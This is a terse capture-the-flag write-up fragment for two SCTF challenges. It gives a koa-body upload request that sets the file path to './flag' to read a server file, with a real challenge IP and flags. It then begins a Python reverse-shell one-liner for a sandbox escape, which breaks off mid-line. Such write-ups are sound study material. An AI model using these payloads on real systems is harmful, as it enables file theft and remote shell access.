Web CloudDisk Score: 250 flag: SCTF{47cf9489d8832e44312dssxag6f88f45736e0e9c8} https://github.com/dlau/koa-body/issues/75 http://120.79.1.217:7777/uploadfile { "files": { "file": { "name": "jankincai", "path": "./flag" } } } Upload success ~, your fileId is here:3484b276cc6038b0378ddcf65880b04f http://120.79.1.217:7777/downloadfile/3484b276cc6038b0378ddcf65880b04f pysandbox Score: 377 flags: SCTF{N0_p4renth3s1s_2_RCe_1s_1nt3r3stlng} 生成字符集 ss = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fil